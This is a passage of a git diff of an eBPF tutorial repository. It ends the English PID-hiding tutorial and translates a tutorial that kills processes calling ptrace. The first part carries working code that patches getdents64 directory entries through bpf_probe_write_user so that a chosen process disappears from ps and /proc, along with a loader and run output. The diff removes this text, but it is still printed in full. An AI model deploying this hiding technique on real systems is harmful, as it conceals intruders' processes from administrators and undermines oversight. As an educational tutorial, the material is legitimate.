of type Ringbuffer, which is used to pass messages from the kernel to the userland; Ringbuffer is a data structure that can efficiently pass large amounts of data between the kernel and the userland. - -"map_buffs" is a map of type Hash which is used to store buffer addresses for directory entries. - -"map_bytes_read" is another Hash-type map that is used to enable searching in data loops. - -"map_to_patch" is another Hash type map that stores the address of the directory entry (dentry) that needs to be modified. - -"map_prog_array" is a map of type Prog Array, which is used to store the tail calls of a programme. - -The "target_ppid" and "pid_to_hide_len" and "pid_to_hide" in the program are a few important global variables that store the PID of the target parent process, the length of the PID that needs to be hidden, and the PID that needs to be hidden, respectively. - -In the next part of the code, the program defines a structure called "linux_dirent64", which represents a Linux directory entry. The program then defines two functions, "handle_getdents_enter" and "handle_getdents_exit", which are called at the entry and exit of the getdents64 system call, respectively, and are used to implement operations on the directory entry. - -```c - -// Optional Target Parent PID -const volatile int target_ppid = 0; - -// These store the string representation -// of the PID to hide. This becomes the name -// of the folder in /proc/ -const volatile int pid_to_hide_len = 0; -const volatile char pid_to_hide[MAX_PID_LEN]; - -// struct linux_dirent64 { -// u64 d_ino; /* 64-bit inode number */ -// u64 d_off; /* 64-bit offset to next structure */ -// unsigned short d_reclen; /* Size of this dirent */ -// unsigned char d_type; /* File type */ -// char d_name[]; /* Filename (null-terminated) */ }; -// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); -SEC("tp/syscalls/sys_enter_getdents64") -int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx) -{ - size_t pid_tgid = bpf_get_current_pid_tgid(); - // Check if we're a process thread of interest - // if target_ppid is 0 then we target all pids - if (target_ppid != 0) { - struct task_struct *task = (struct task_struct *)bpf_get_current_task(); - int ppid = BPF_CORE_READ(task, real_parent, tgid); - if (ppid != target_ppid) { - return 0; - } - } - int pid = pid_tgid >> 32; - unsigned int fd = ctx->args[0]; - unsigned int buff_count = ctx->args[2]; - - // Store params in map for exit function - struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1]; - bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY); - - return 0; -} -``` - -In this section of the code, we can see part of the implementation of the eBPF program that is responsible for the processing at the entry point of the `getdents64` system call. - -We start by declaring a few global variables. The `target_ppid` represents the PID of the target parent we want to focus on, and if this value is 0, then we will focus on all processes. `pid_to_hide_len` and `pid_to_hide` are used to store the length of the PID of the process we want to hide from, and the PID itself, respectively. This PID is translated into the name of a folder in the `/proc/` directory, so the hidden process will not be visible in the `/proc/` directory. - -Next, we declare a structure called `linux_dirent64`. This structure represents a Linux directory entry and contains metadata such as the inode number, the offset of the next directory entry, the length of the current directory entry, the file type, and the filename. - -Then there is the prototype for the `getdents64` function. This function is a Linux system call that reads the contents of a directory. Our goal is to modify the directory entries during the execution of this function to enable process hiding. - -The subsequent section is the concrete implementation of the eBPF program. We define a function called `handle_getdents_enter` at the entry point of the `getdents64` system call. This function first gets the PID and thread group ID of the current process, and then checks to see if it is the process we are interested in. If we set `target_ppid`, then we only focus on processes whose parent has a PID of `target_ppid`. If `target_ppid` is 0, we focus on all processes. - -After confirming that the current process is the one we are interested in, we save the arguments to the `getdents64` system call into a map to be used when the system call returns. In particular, we focus on the second argument to the `getdents64` system call, which is a pointer to the `linux_dirent64` structure representing the contents of the directory to be read by the system call. We save this pointer, along with the current PID and thread group ID, as a key-value pair in the `map_buffs` map. - -This completes the processing at the entry point of the `getdents64` system call. When the system call returns, we will modify the directory entry in the `handle_getdents_exit` function to hide the process. - -In the next snippet, we will implement the handling at the return of the `getdents64` system call. Our main goal is to find the process we want to hide and modify the directory entry to hide it. - -We start by defining a function called `handle_getdents_exit` that will be called when the `getdents64` system call returns. - -```c - -SEC("tp/syscalls/sys_exit_getdents64") -int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx) -{ - size_t pid_tgid = bpf_get_current_pid_tgid(); - int total_bytes_read = ctx->ret; - // if bytes_read is 0, everything's been read - if (total_bytes_read <= 0) { - return 0; - } - - // Check we stored the address of the buffer from the syscall entry - long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid); - if (pbuff_addr == 0) { - return 0; - } - - // All of this is quite complex, but basically boils down to - // Calling 'handle_getdents_exit' in a loop to iterate over the file listing - // in chunks of 200, and seeing if a folder with the name of our pid is in there. - // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual - // patching - long unsigned int buff_addr = *pbuff_addr; - struct linux_dirent64 *dirp = 0; - int pid = pid_tgid >> 32; - short unsigned int d_reclen = 0; - char filename[MAX_PID_LEN]; - - unsigned int bpos = 0; - unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid); - if (pBPOS != 0) { - bpos = *pBPOS; - } - - for (int i = 0; i < 200; i ++) { - if (bpos >= total_bytes_read) { - break; - } - dirp = (struct linux_dirent64 *)(buff_addr+bpos); - bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); - bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); - - int j = 0; - for (j = 0; j < pid_to_hide_len; j++) { - if (filename[j] != pid_to_hide[j]) { - break; - } - } - if (j == pid_to_hide_len) { - // *********** - // We've found the folder!!! - // Jump to handle_getdents_patch so we can remove it! - // *********** - bpf_map_delete_elem(&map_bytes_read, &pid_tgid); - bpf_map_delete_elem(&map_buffs, &pid_tgid); - bpf_tail_call(ctx, &map_prog_array, PROG_02); - } - bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY); - bpos += d_reclen; - } - - // If we didn't find it, but there's still more to read, - // jump back the start of this function and keep looking - if (bpos < total_bytes_read) { - bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY); - bpf_tail_call(ctx, &map_prog_array, PROG_01); - } - bpf_map_delete_elem(&map_bytes_read, &pid_tgid); - bpf_map_delete_elem(&map_buffs, &pid_tgid); - - return 0; -} - -``` - -In this function, we first get the PID and thread group ID of the current process, and then check to see if the system call has read the contents of the directory. If it didn't read the contents, we just return. - -Then we get the address of the directory contents saved at the entry point of the `getdents64` system call from the `map_buffs` map. If we haven't saved this address, then there's no need to do any further processing. - -The next part is a bit more complicated, we use a loop to iteratively read the contents of the directory and check to see if we have the PID of the process we want to hide, and if we do, we use the `bpf_tail_call` function to jump to the `handle_getdents_patch` function to do the actual hiding. - -```c -SEC("tp/syscalls/sys_exit_getdents64") -int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) -{ - // Only patch if we've already checked and found our pid's folder to hide - size_t pid_tgid = bpf_get_current_pid_tgid(); - long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid); - if (pbuff_addr == 0) { - return 0; - } - - // Unlink target, by reading in previous linux_dirent64 struct, - // and setting it's d_reclen to cover itself and our target. - // This will make the program skip over our folder. - long unsigned int buff_addr = *pbuff_addr; - struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr; - short unsigned int d_reclen_previous = 0; - bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen); - - struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous); - short unsigned int d_reclen = 0; - bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); - - // Debug print - char filename[MAX_PID_LEN]; - bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name); - filename[pid_to_hide_len-1] = 0x00; - bpf_printk("[PID_HIDE] filename previous %s\n", filename); - bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); - filename[pid_to_hide_len-1] = 0x00; - bpf_printk("[PID_HIDE] filename next one %s\n", filename); - - // Attempt to overwrite - short unsigned int d_reclen_new = d_reclen_previous + d_reclen; - long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new)); - - // Send an event - struct event *e; - e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); - if (e) { - e->success = (ret == 0); - e->pid = (pid_tgid >> 32); - bpf_get_current_comm(&e->comm, sizeof(e->comm)); - bpf_ringbuf_submit(e, 0); - } - - bpf_map_delete_elem(&map_to_patch, &pid_tgid); - return 0; -} - -``` - -In the `handle_getdents_patch` function, we first check to see if we have found the PID of the process we want to hide, and then we read the contents of the directory entry and modify the `d_reclen` field so that it overwrites the next directory entry, thus hiding our target process. - -In this process, we use the functions `bpf_probe_read_user`, `bpf_probe_read_user_str`, and `bpf_probe_write_user` to read and write user-space data. This is because in kernel space, we can't access user space data directly and must use these special functions. - -After we finish the hiding operation, we send an event to a ring buffer called `rb` indicating that we have successfully hidden a process. We reserve space in the buffer with the `bpf_ringbuf_reserve` function, then fill that space with the event's data, and finally commit the event to the buffer with the `bpf_ringbuf_submit` function. - -Finally, we clean up the data previously saved in the map and return. - -This code is a good example of process hiding in an eBPF environment. Through this example, we can see the rich features provided by eBPF, such as system call tracing, map storage, user-space data access, tail calls, and so on. These features allow us to implement complex logic in kernel space without modifying the kernel code. - -## User-Style eBPF Programming - -We perform the following operations in the userland eBPF program: - -1. Open the eBPF program. -2. Set the PID of the process we want to hide. -3. Verify and load the eBPF program. -4. Wait for and process events sent by the eBPF program. - -First, we open the eBPF application. This is done by calling the `pidhide_bpf__open` function. If this process fails, we simply return. - -```c - skel = pidhide_bpf__open(); - if (!skel) - { - fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); - return 1; - } -``` - -Next, we set the PIDs of the processes we want to hide, which is done by saving the PIDs to the `rodata` area of the eBPF program. By default, we hide the current process. - -```c - char pid_to_hide[10]; - if (env.pid_to_hide == 0) - { - env.pid_to_hide = getpid(); - } - sprintf(pid_to_hide, "%d", env.pid_to_hide); - strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide)); - skel->rodata->pid_to_hide_len = strlen(pid_to_hide) + 1; - skel->rodata->target_ppid = env.target_ppid; -``` - -We then validate and load the eBPF program. This is done by calling the `pidhide_bpf__load` function. If this process fails, we perform a cleanup operation. - -```c - err = pidhide_bpf__load(skel); - if (err) - { - fprintf(stderr, "Failed to load and verify BPF skeleton\n"); - goto cleanup; - } -``` - -Finally, we wait for and process events sent by the eBPF program. This process is achieved by calling the `ring_buffer__poll` function. During this process, we check the ring buffer every so often for new events. If there is, we call the `handle_event` function to handle the event. - -```c -printf("Successfully started!\n"); -printf("Hiding PID %d\n", env.pid_to_hide); -while (!exiting) -{ - err = ring_buffer__poll(rb, 100 /* timeout, ms */); - /* Ctrl-C will cause -EINTR */ - if (err == -EINTR) - { - err = 0; - break; - } - if (err < 0) - { - printf("Error polling perf buffer: %d\n", err); - break; - } -} -``` - -In the `handle_event` function, we print the appropriate message based on the content of the event. The arguments to this function include a context, the data of the event, and the size of the data. We first convert the event data into an `event` structure, then determine if the event successfully hides a process based on the `success` field, and finally print the corresponding message. - -and then print the corresponding message. - -```c -static int handle_event(void *ctx, void *data, size_t data_sz) -{ - const struct event *e = data; - if (e->success) - printf("Hid PID from program %d (%s)\n", e->pid, e->comm); - else - printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm); - return 0; -} -``` - -This code shows how to use the eBPF programme to hide a process in the user state. We first open the eBPF application, then set the PID of the process we want to hide, then validate and load the eBPF application, and finally wait for and process the events sent by the eBPF application. This process makes use of some advanced features provided by eBPF, such as ring buffers and event handling, which allow us to easily interact with the kernel state eBPF program from the user state. - -Full source code: https: [//github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide) - -> The techniques shown in this paper are for proof of concept only and are intended for learning purposes only, and are not to be used in scenarios that do not comply with legal or regulatory requirements. - -## Compile and Run - -```bash -make -``` - -```sh -sudo ./pidhide --pid-to-hide 1534 -``` - -```console -$ ps -aux | grep 1534 -yunwei 1534 0.0 0.0 244540 6848 ? Ssl 6月02 0:00 /usr/libexec/gvfs-mtp-volume-monitor -yunwei 32065 0.0 0.0 17712 2580 pts/1 S+ 05:43 0:00 grep --color=auto 1534 -``` - -```console -$ sudo ./pidhide --pid-to-hide 1534 -Hiding PID 1534 -Hid PID from program 31529 (ps) -Hid PID from program 31551 (ps) -Hid PID from program 31560 (ps) -Hid PID from program 31582 (ps) -Hid PID from program 31582 (ps) -Hid PID from program 31585 (bash) -Hid PID from program 31585 (bash) -Hid PID from program 31609 (bash) -Hid PID from program 31640 (ps) -Hid PID from program 31649 (ps) -``` - -```console -$ ps -aux | grep 1534 -root 31523 0.1 0.0 22004 5616 pts/2 S+ 05:42 0:00 sudo ./pidhide -p 1534 -root 31524 0.0 0.0 22004 812 pts/3 Ss 05:42 0:00 sudo ./pidhide -p 1534 -root 31525 0.3 0.0 3808 2456 pts/3 S+ 05:42 0:00 ./pidhide -p 1534 -yunwei 31583 0.0 0.0 17712 2612 pts/1 S+ 05:42 0:00 grep --color=auto 1534 -``` - -## Summary - -You can also visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and the full tutorial. - -> The original link of this article: diff --git a/src/25-signal/README.md b/src/25-signal/README.md index be96d62..3160ac3 100644 --- a/src/25-signal/README.md +++ b/src/25-signal/README.md @@ -1,54 +1,60 @@ -# eBPF 入门实践教程:用 bpf_send_signal 发送信号终止恶意进程 +# Using bpf_send_signal to Terminate Malicious Processes in eBPF -eBPF (扩展的伯克利数据包过滤器) 是 Linux 内核的一种革命性技术,允许用户在内核空间执行自定义程序,而不需要修改内核源代码或加载任何内核模块。这使得开发人员可以非常灵活地对 Linux 系统进行观测、修改和控制。 +eBPF (Extended Berkeley Packet Filter) is a revolutionary technology in the Linux kernel that allows users to execute custom programs in kernel space without modifying the kernel source code or loading any kernel modules. This provides developers with great flexibility to observe, modify, and control the Linux system. -本文介绍了如何使用 eBPF 的 bpf_send_signal 功能,向指定的进程发送信号进行干预。本文完整的源代码和更多的教程文档,请参考 +This article introduces how to use the `bpf_send_signal` feature of eBPF to intervene by sending signals to specified processes. For more tutorial documentation and complete source code, please refer to . -## 使用场景 +## Use Cases -**1. 性能分析:** -在现代软件生态系统中,优化应用程序的性能是开发人员和系统管理员的一个核心任务。当应用程序,如 hhvm,出现运行缓慢或资源利用率异常高时,它可能会对整个系统产生不利影响。因此,定位这些性能瓶颈并及时解决是至关重要的。 +**1. Performance Issues:** -**2. 异常检测与响应:** -任何运行在生产环境中的系统都可能面临各种异常情况,从简单的资源泄露到复杂的恶意软件攻击。在这些情况下,系统需要能够迅速、准确地检测到这些异常,并采取适当的应对措施。 +Optimizing the performance of applications is a core task for developers and system administrators in the modern software ecosystem. When applications, such as hhvm, run slowly or have abnormally high resource utilization, they can adversely affect the entire system. Therefore, pinpointing these performance bottlenecks and resolving them promptly is crucial. -**3. 动态系统管理:** -随着云计算和微服务架构的普及,能够根据当前系统状态动态调整资源配置和应用行为已经成为了一个关键需求。例如,根据流量波动自动扩容或缩容,或者在检测到系统过热时降低 CPU 频率。 +**2. Anomaly Detection and Response:** -### 现有方案的不足 +Any system running in a production environment may face various anomalies, from simple resource leaks to complex malware attacks. In these situations, the system needs to detect these anomalies quickly and accurately and take appropriate countermeasures. -为了满足上述使用场景的需求,传统的技术方法如下: +**3. Dynamic System Management:** -- 安装一个 bpf 程序,该程序会持续监视系统,同时对一个 map 进行轮询。 -- 当某个事件触发了 bpf 程序中定义的特定条件时,它会将相关数据写入此 map。 -- 接着,外部分析工具会从该 map 中读取数据,并根据读取到的信息向目标进程发送信号。 +With the rise of cloud computing and microservice architectures, dynamically adjusting resource configurations and application behaviors based on the current system state has become a key requirement. For example, auto-scaling based on traffic fluctuations or reducing CPU frequency when detecting system overheating. -尽管这种方法在很多场景中都是可行的,但它存在一个主要的缺陷:从事件发生到外部工具响应的时间延迟可能相对较大。这种延迟可能会影响到事件的响应速度,从而使得性能分析的结果不准确或者在面对恶意活动时无法及时作出反应。 +### Limitations of Existing Solutions -### 新方案的优势 +To meet the needs of the above use cases, traditional technical methods are as follows: -为了克服传统方法的这些限制,Linux 内核提供了 `bpf_send_signal` 和 `bpf_send_signal_thread` 这两个 helper 函数。 +- Install a bpf program that continuously monitors the system while polling a map. +- When an event triggers specific conditions defined in the bpf program, it writes related data to this map. +- Then, external analysis tools read data from this map and send signals to the target process based on the retrieved information. -这两个函数带来的主要优势包括: +Although this method is feasible in many scenarios, it has a major flaw: the time delay from when the event occurs to when the external tool responds can be relatively large. This delay can affect the speed of event response, making performance analysis results inaccurate or failing to respond promptly to malicious activity. -**1. 实时响应:** -通过直接从内核空间发送信号,避免了用户空间的额外开销,这确保了信号能够在事件发生后立即被发送,大大减少了延迟。 +### Advantages of the New Solution -**2. 准确性:** -得益于减少的延迟,现在我们可以获得更准确的系统状态快照,这对于性能分析和异常检测尤其重要。 +To overcome the limitations of traditional methods, the Linux kernel offers the `bpf_send_signal` and `bpf_send_signal_thread` helper functions. -**3. 灵活性:** -这些新的 helper 函数为开发人员提供了更多的灵活性,他们可以根据不同的使用场景和需求来自定义信号的发送逻辑,从而更精确地控制和管理系统行为。 +The main advantages of these functions include: -## 内核态代码分析 +**1. Real-time Response:** -在现代操作系统中,一种常见的安全策略是监控和控制进程之间的交互。尤其在Linux系统中,`ptrace` 系统调用是一个强大的工具,它允许一个进程观察和控制另一个进程的执行,并修改其寄存器和内存。这使得它成为了调试和跟踪工具(如 `strace` 和 `gdb`)的主要机制。然而,恶意的 `ptrace` 使用也可能导致安全隐患。 +By sending signals directly from kernel space, avoiding extra overhead in user space, signals can be sent immediately after an event occurs, significantly reducing latency. -这个程序的目标是在内核态监控 `ptrace` 的调用,当满足特定的条件时,它会发送一个 `SIGKILL` 信号终止调用进程。此外,为了调试或审计目的,该程序会记录这种干预并将相关信息发送到用户空间。 +**2. Accuracy:** -## 代码分析 +Thanks to reduced latency, we can now obtain a more accurate snapshot of the system state, especially important for performance analysis and anomaly detection. -### 1. 数据结构定义 (`signal.h`) +**3. Flexibility:** + +These new helper functions provide developers with more flexibility. They can customize the signal sending logic according to different use cases and needs, allowing for more precise control and management of system behavior. + +## Kernel Code Analysis + +In modern operating systems, a common security strategy is to monitor and control interactions between processes. Especially in Linux systems, the `ptrace` system call is a powerful tool that allows one process to observe and control the execution of another process, modifying its registers and memory. This makes it the primary mechanism for debugging and tracing tools like `strace` and `gdb`. However, malicious use of `ptrace` can also pose security risks. + +The goal of this program is to monitor `ptrace` calls in kernel mode. When specific conditions are met, it sends a `SIGKILL` signal to terminate the calling process. Additionally, for debugging or auditing purposes, the program logs this intervention and sends related information to user space. + +## Code Analysis + +### 1. Data Structure Definition (`signal.h`) signal.h @@ -63,9 +69,9 @@ struct event { }; ``` -这部分定义了一个简单的消息结构,用于从内核的 eBPF 程序传递事件到用户空间。结构包括进程ID、命令名和一个标记是否成功发送信号的布尔值。 +This section defines a simple message structure used to pass events from eBPF programs in the kernel to user space. The structure includes the process ID, command name, and a boolean value indicating whether the signal was successfully sent. -### 2. eBPF 程序 (`signal.bpf.c`) +### 2. eBPF Program (`signal.bpf.c`) signal.bpf.c @@ -121,57 +127,56 @@ int bpf_dos(struct trace_event_raw_sys_enter *ctx) } ``` -- **许可证声明** +- **License Declaration** - 声明了程序的许可证为 "Dual BSD/GPL",这是为了满足 Linux 内核对 eBPF 程序的许可要求。 + The program's license is declared as "Dual BSD/GPL". This is to meet the Linux kernel's licensing requirements for eBPF programs. - **Ringbuffer Map** - 这是一个 ring buffer 类型的 map,允许 eBPF 程序在内核空间产生的消息被用户空间程序高效地读取。 + This is a ring buffer type map that allows messages generated by the eBPF program in kernel space to be efficiently read by user space programs. -- **目标父进程ID** +- **Target Parent Process ID** - `target_ppid` 是一个可选的父进程ID,用于限制哪些进程受到影响。如果它被设置为非零值,只有与其匹配的进程才会被目标。 + `target_ppid` is an optional parent process ID used to limit which processes are affected. If set to a non-zero value, only processes that match it will be targeted. -- **主函数 `bpf_dos`** +- **Main Function `bpf_dos`** - - **进程检查** - 程序首先获取当前进程的ID。如果设置了 `target_ppid`,它还会获取当前进程的父进程ID并进行比较。如果两者不匹配,则直接返回。 + - **Process Check** + The program first retrieves the current process's ID. If `target_ppid` is set, it also retrieves the current process's parent process ID and compares them. If they don't match, it returns immediately. - - **发送信号** - 使用 `bpf_send_signal(9)` 来发送 `SIGKILL` 信号。这将终止调用 `ptrace` 的进程。 + - **Sending Signal** + It uses `bpf_send_signal(9)` to send a `SIGKILL` signal. This terminates the process calling `ptrace`. - - **记录事件** - 使用 ring buffer map 记录这个事件。这包括了是否成功发送信号、进程ID以及进程的命令名。 + - **Logging the Event** + The event is logged using the ring buffer map. This includes whether the signal was successfully sent, the process ID, and the process's command name. -总结:这个 eBPF 程序提供了一个方法,允许系统管理员或安全团队在内核级别监控和干预 `ptrace` 调用,提供了一个对抗潜在恶意活动或误操作的额外层次。 +In summary, this eBPF program provides a method that allows system administrators or security teams to monitor and intervene `ptrace` calls at the kernel level, offering an additional layer against potential malicious activities or misoperations. -## 编译运行 +## Compilation and Execution -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to to download and install the `ecc` compiler toolchain and `ecli` runtime. We use eunomia-bpf to compile and run this example. -编译: +Compilation: ```bash ./ecc signal.bpf.c signal.h ``` -使用方式: +Usage: ```console $ sudo ./ecli package.json TIME PID COMM SUCCESS ``` -这个程序会对任何试图使用 `ptrace` 系统调用的程序,例如 `strace`,发出 `SIG_KILL` 信号。 -一旦 eBPF 程序开始运行,你可以通过运行以下命令进行测试: +This program will send a `SIG_KILL` signal to any program attempting to use the `ptrace` system call, such as `strace`. Once the eBPF program starts running, you can test it by running the following command: ```bash $ strace /bin/whoami Killed ``` -原先的 console 中会输出: +The original console will output: ```txt INFO [bpf_loader_lib::skeleton] Running ebpf program... @@ -179,15 +184,17 @@ TIME PID COMM SUCCESS 13:54:45 8857 strace true ``` -完整的源代码可以参考: +The complete source code can be found at: -## 总结 +## Conclusion -通过这个实例,我们深入了解了如何将 eBPF 程序与用户态程序相结合,实现对系统调用的监控和干预。eBPF 提供了一种在内核空间执行程序的机制,这种技术不仅限于监控,还可用于性能优化、安全防御、系统诊断等多种场景。对于开发者来说,这为Linux系统的性能调优和故障排查提供了一种强大且灵活的工具。 +Through this example, we delved into how to combine eBPF programs with user-space programs to monitor and intervene in system calls. eBPF provides a mechanism for executing programs in kernel space. This technology is not limited to monitoring but can also be used for performance optimization, security defense, system diagnostics, and various other scenarios. For developers, it offers a powerful and flexible tool for performance tuning and troubleshooting in Linux systems. -最后,如果您对 eBPF 技术感兴趣,并希望进一步了解和实践,可以访问我们的教程代码仓库 和教程网站 +Lastly, if you are interested in eBPF technology and wish to further understand and practice, you can visit our tutorial code repository and tutorial website . -## 参考资料 +## References - - + +> The original link of this article: diff --git a/src/25-signal/README.zh.md b/src/25-signal/README.zh.md new file mode 100644 index 0000000..be96d62 --- /dev/null +++ b/src/25-signal/README.zh.md @@ -0,0 +1,193 @@ +# eBPF 入门实践教程:用 bpf_send_signal 发送信号终止恶意进程 + +eBPF (扩展的伯克利数据包过滤器) 是 Linux 内核的一种革命性技术,允许用户在内核空间执行自定义程序,而不需要修改内核源代码或加载任何内核模块。这使得开发人员可以非常灵活地对 Linux 系统进行观测、修改和控制。 + +本文介绍了如何使用 eBPF 的 bpf_send_signal 功能,向指定的进程发送信号进行干预。本文完整的源代码和更多的教程文档,请参考 + +## 使用场景 + +**1. 性能分析:** +在现代软件生态系统中,优化应用程序的性能是开发人员和系统管理员的一个核心任务。当应用程序,如 hhvm,出现运行缓慢或资源利用率异常高时,它可能会对整个系统产生不利影响。因此,定位这些性能瓶颈并及时解决是至关重要的。 + +**2. 异常检测与响应:** +任何运行在生产环境中的系统都可能面临各种异常情况,从简单的资源泄露到复杂的恶意软件攻击。在这些情况下,系统需要能够迅速、准确地检测到这些异常,并采取适当的应对措施。 + +**3. 动态系统管理:** +随着云计算和微服务架构的普及,能够根据当前系统状态动态调整资源配置和应用行为已经成为了一个关键需求。例如,根据流量波动自动扩容或缩容,或者在检测到系统过热时降低 CPU 频率。 + +### 现有方案的不足 + +为了满足上述使用场景的需求,传统的技术方法如下: + +- 安装一个 bpf 程序,该程序会持续监视系统,同时对一个 map 进行轮询。 +- 当某个事件触发了 bpf 程序中定义的特定条件时,它会将相关数据写入此 map。 +- 接着,外部分析工具会从该 map 中读取数据,并根据读取到的信息向目标进程发送信号。 + +尽管这种方法在很多场景中都是可行的,但它存在一个主要的缺陷:从事件发生到外部工具响应的时间延迟可能相对较大。这种延迟可能会影响到事件的响应速度,从而使得性能分析的结果不准确或者在面对恶意活动时无法及时作出反应。 + +### 新方案的优势 + +为了克服传统方法的这些限制,Linux 内核提供了 `bpf_send_signal` 和 `bpf_send_signal_thread` 这两个 helper 函数。 + +这两个函数带来的主要优势包括: + +**1. 实时响应:** +通过直接从内核空间发送信号,避免了用户空间的额外开销,这确保了信号能够在事件发生后立即被发送,大大减少了延迟。 + +**2. 准确性:** +得益于减少的延迟,现在我们可以获得更准确的系统状态快照,这对于性能分析和异常检测尤其重要。 + +**3. 灵活性:** +这些新的 helper 函数为开发人员提供了更多的灵活性,他们可以根据不同的使用场景和需求来自定义信号的发送逻辑,从而更精确地控制和管理系统行为。 + +## 内核态代码分析 + +在现代操作系统中,一种常见的安全策略是监控和控制进程之间的交互。尤其在Linux系统中,`ptrace` 系统调用是一个强大的工具,它允许一个进程观察和控制另一个进程的执行,并修改其寄存器和内存。这使得它成为了调试和跟踪工具(如 `strace` 和 `gdb`)的主要机制。然而,恶意的 `ptrace` 使用也可能导致安全隐患。 + +这个程序的目标是在内核态监控 `ptrace` 的调用,当满足特定的条件时,它会发送一个 `SIGKILL` 信号终止调用进程。此外,为了调试或审计目的,该程序会记录这种干预并将相关信息发送到用户空间。 + +## 代码分析 + +### 1. 数据结构定义 (`signal.h`) + +signal.h + +```c +// Simple message structure to get events from eBPF Programs +// in the kernel to user space +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; +``` + +这部分定义了一个简单的消息结构,用于从内核的 eBPF 程序传递事件到用户空间。结构包括进程ID、命令名和一个标记是否成功发送信号的布尔值。 + +### 2. eBPF 程序 (`signal.bpf.c`) + +signal.bpf.c + +```c +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +SEC("tp/syscalls/sys_enter_ptrace") +int bpf_dos(struct trace_event_raw_sys_enter *ctx) +{ + long ret = 0; + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Send signal. 9 == SIGKILL + ret = bpf_send_signal(9); + + // Log event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + return 0; +} +``` + +- **许可证声明** + + 声明了程序的许可证为 "Dual BSD/GPL",这是为了满足 Linux 内核对 eBPF 程序的许可要求。 + +- **Ringbuffer Map** + + 这是一个 ring buffer 类型的 map,允许 eBPF 程序在内核空间产生的消息被用户空间程序高效地读取。 + +- **目标父进程ID** + + `target_ppid` 是一个可选的父进程ID,用于限制哪些进程受到影响。如果它被设置为非零值,只有与其匹配的进程才会被目标。 + +- **主函数 `bpf_dos`** + + - **进程检查** + 程序首先获取当前进程的ID。如果设置了 `target_ppid`,它还会获取当前进程的父进程ID并进行比较。如果两者不匹配,则直接返回。 + + - **发送信号** + 使用 `bpf_send_signal(9)` 来发送 `SIGKILL` 信号。这将终止调用 `ptrace` 的进程。 + + - **记录事件** + 使用 ring buffer map 记录这个事件。这包括了是否成功发送信号、进程ID以及进程的命令名。 + +总结:这个 eBPF 程序提供了一个方法,允许系统管理员或安全团队在内核级别监控和干预 `ptrace` 调用,提供了一个对抗潜在恶意活动或误操作的额外层次。 + +## 编译运行 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +编译: + +```bash +./ecc signal.bpf.c signal.h +``` + +使用方式: + +```console +$ sudo ./ecli package.json +TIME PID COMM SUCCESS +``` + +这个程序会对任何试图使用 `ptrace` 系统调用的程序,例如 `strace`,发出 `SIG_KILL` 信号。 +一旦 eBPF 程序开始运行,你可以通过运行以下命令进行测试: + +```bash +$ strace /bin/whoami +Killed +``` + +原先的 console 中会输出: + +```txt +INFO [bpf_loader_lib::skeleton] Running ebpf program... +TIME PID COMM SUCCESS +13:54:45 8857 strace true +``` + +完整的源代码可以参考: + +## 总结 + +通过这个实例,我们深入了解了如何将 